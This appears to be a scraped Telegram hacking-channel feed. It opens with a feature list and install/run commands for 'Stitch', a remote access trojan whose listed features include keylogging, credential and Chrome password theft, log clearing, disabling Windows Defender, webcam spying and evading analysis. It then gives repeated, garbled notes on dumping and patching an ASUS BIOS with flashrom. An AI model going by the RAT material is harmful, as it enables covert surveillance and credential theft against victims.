- Environment variables access: Useful for reconnaissance and configuration.
- Keylogger: Logs keystrokes with options to manage logs.
- Target machine info: Location and system details provide situational awareness.
- Python script execution: Flexibility for custom tasks.
- Screenshots: Remote visual access to the system's desktop.
- VM detection: Helps evade analysis environments.
- File transfer: Enables exfiltration or delivery of additional payloads.
- Password hash dumping: Attempts to extract sensitive authentication details.
- Payload disguise: Adds stealth by masquerading as legitimate applications.
>> Windows-Specific Features
- Credential Harvesting
- User/password dialog: Captures user input for credentials.
- Chrome password dumping: Extracts stored browser passwords.
- System Control
- Log clearing: Obscures tracks by erasing event logs.
- Service control: Manipulates RDP, UAC, and Windows Defender.
- File timestamp editing: Alters evidence of file access or modification.
- Custom popups: Creates distractions or elicits user input.
- Hardware Interaction
- Webcam snapshots: Spies on users via their webcam.
- Drive info: Provides details about connected drives.
- Registry summary: Fetches system configuration details.
>> macOS-Specific Features
- Credential Harvesting
- Similar password dialog as Windows.
- System Customization
- Changes login text, potentially confusing or misleading users.
- Webcam snapshots: Monitors users like the Windows version.
>> macOS/Linux Features
- SSH pivoting: Leverages the target system to access other hosts.
- Sudo command execution: Elevates privilege level for administrative tasks.
- Bruteforce user password: Exploits weak password practices.
- Webcam snapshots: Unverified functionality on Linux.
>> Transport and Encryption
- AES encryption secures host-target communication, with keys shared manually between systems for authentication.
>> Payload Installation
- NSIS installers (Windows): Packages payloads with elevation utilities.
- Makeself installers (macOS/Linux): Simplifies deployment and persistence.
>> Setup and Dependencies
- The project uses Python 2.7, various libraries like PyCrypto, Requests, and platform-specific tools like PyInstaller, PyObjC, and py2exe.
๐ฆ Here are the commands for setting up and running Stitch from the specified GitHub repository:
>> Installation Commands
1. For Windows:
pip install -r win_requirements.txt
2. For macOS:
pip install -r osx_requirements.txt
3. For Linux:
pip install -r lnx_requirements.txt
>> Execution Commands
1. Run using Python:
python main.py
2. Run as an executable (if permissions are set):
./main.py
๐ฆBe Ethical, Use it for learning purposes !!!
@UndercodeCommunity
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Forwarded from Exploiting Crew (Pr1vAt3)
๐ฆUEFI BIOS Hacking Notes:
1๏ธโฃUSB Device Over Current Status Detected !!
System Will Shut Down After 15 Seconds.
(November-2020): After downloading the BoardView file for a similar motherboard, I learned about the various OC (over current) detection sub-circuits present on the motherboard. I systematically checked the reference voltages present at all (4) of those voltage dividers and found them to be 3.26+ volts. Note: These voltage dividers ("sensors") are directly connected to the Mobo's PCH.
I also carried out the following debugging steps:
All of the USB ports were providing +5v and were able to detect the keyboard during BIOS POST (Caps Lock responded). They all seemed to be OK.
The single USB-C port on this mobo was also providing power to charge things just fine.
I connected the USB keyboard to the PS2 port but the BIOS was disabling all inputs when this 'USB OC' problem is detected.
All of the USB devices were subsequently disconnected for safety.
The cables for the front-panel USB connectors were disconnected as well.
However, the BIOS error about 'USB OC' persisted. I then dumped the BIOS from the W25Q128FV BIOS chip (thankfully present in DIP-8 form factor) using flashrom on Linux with CH341A Mini USB BIOS Programmer hardware.
I started my Desktop System after a couple of weeks, and found that the ASUS Z170-AR 1.03 motherboard was failing to POST successfully with the following error message:
1๏ธโฃUSB Device Over Current Status Detected !!
System Will Shut Down After 15 Seconds.
(November-2020): After downloading the BoardView file for a similar motherboard, I learned about the various OC (over current) detection sub-circuits present on the motherboard. I systematically checked the reference voltages present at all (4) of those voltage dividers and found them to be 3.26+ volts. Note: These voltage dividers ("sensors") are directly connected to the Mobo's PCH.
I also carried out the following debugging steps:
All of the USB ports were providing +5v and were able to detect the keyboard during BIOS POST (Caps Lock responded). They all seemed to be OK.
The single USB-C port on this mobo was also providing power to charge things just fine.
I connected the USB keyboard to the PS2 port but the BIOS was disabling all inputs when this 'USB OC' problem is detected.
All of the USB devices were subsequently disconnected for safety.
The cables for the front-panel USB connectors were disconnected as well.
However, the BIOS error about 'USB OC' persisted. I then dumped the BIOS from the W25Q128FV BIOS chip (thankfully present in DIP-8 form factor) using flashrom on Linux with CH341A Mini USB BIOS Programmer hardware.
Forwarded from Exploiting Crew (Pr1vAt3)
2๏ธโฃ
$ sudo ./flashrom --programmer ch341a_spi -r bios_dump_another.rom
flashrom v1.2-136-ged341cf on Linux 5.8.0-26-lowlatency (x86_64)
flashrom is free software, get the source code at https://flashrom.org
Using clock_gettime for delay loops (clk_id: 1, resolution: 1ns).
Found Winbond flash chip "W25Q128.V" (16384 kB, SPI) on ch341a_spi.
Reading flash... done.
Forwarded from Exploiting Crew (Pr1vAt3)
3๏ธโฃThis dumping process took around 2.5 minutes. The dump matched the "BIOS ROM file" which I extracted from the Z170-AR-ASUS-3801.CAP (downloaded from ASUS' website) using UEFITool.
Note: This board uses the ASM1142 USB 3.0 chip which has its own over current (OC) detection. I couldn't find the BoardView for my Z170-AR 1.03 motherboard and hence I had to pause the hardware debugging process at this point.
Next, switching to the SW sides of things, I was able to patch the ASUS BIOS using UEFITool, GHIDRA, Cutter (Rizin GUI), and WinHex to bypass this USB OC error message (and the subsequent PC hang)!
binwalk -eM bios.rom # bios.rom is extracted from UEFItool.
[user@random _flash-me.rom.extracted]$ find . -type f -exec strings {} \; | grep "USB Device"
USB Device Over Current Status Detected !!
Note: This board uses the ASM1142 USB 3.0 chip which has its own over current (OC) detection. I couldn't find the BoardView for my Z170-AR 1.03 motherboard and hence I had to pause the hardware debugging process at this point.
Next, switching to the SW sides of things, I was able to patch the ASUS BIOS using UEFITool, GHIDRA, Cutter (Rizin GUI), and WinHex to bypass this USB OC error message (and the subsequent PC hang)!
binwalk -eM bios.rom # bios.rom is extracted from UEFItool.
[user@random _flash-me.rom.extracted]$ find . -type f -exec strings {} \; | grep "USB Device"
USB Device Over Current Status Detected !!
Telegram
UNDERCODE COMMUNITY
๐ฆ Undercode Cyber World!
@UndercodeCommunity
FREE
- Hackers Post Monitor:
Latest Bug bounty Methods, Tools Updates, AI, Courses! @Undercode_Testing
- Cyber & Tech NEWS:
@Undercode_News
- CVE: @Daily_CVE
โจOfficial Web & Services:
โ Undercode.help
@UndercodeCommunity
FREE
- Hackers Post Monitor:
Latest Bug bounty Methods, Tools Updates, AI, Courses! @Undercode_Testing
- Cyber & Tech NEWS:
@Undercode_News
- CVE: @Daily_CVE
โจOfficial Web & Services:
โ Undercode.help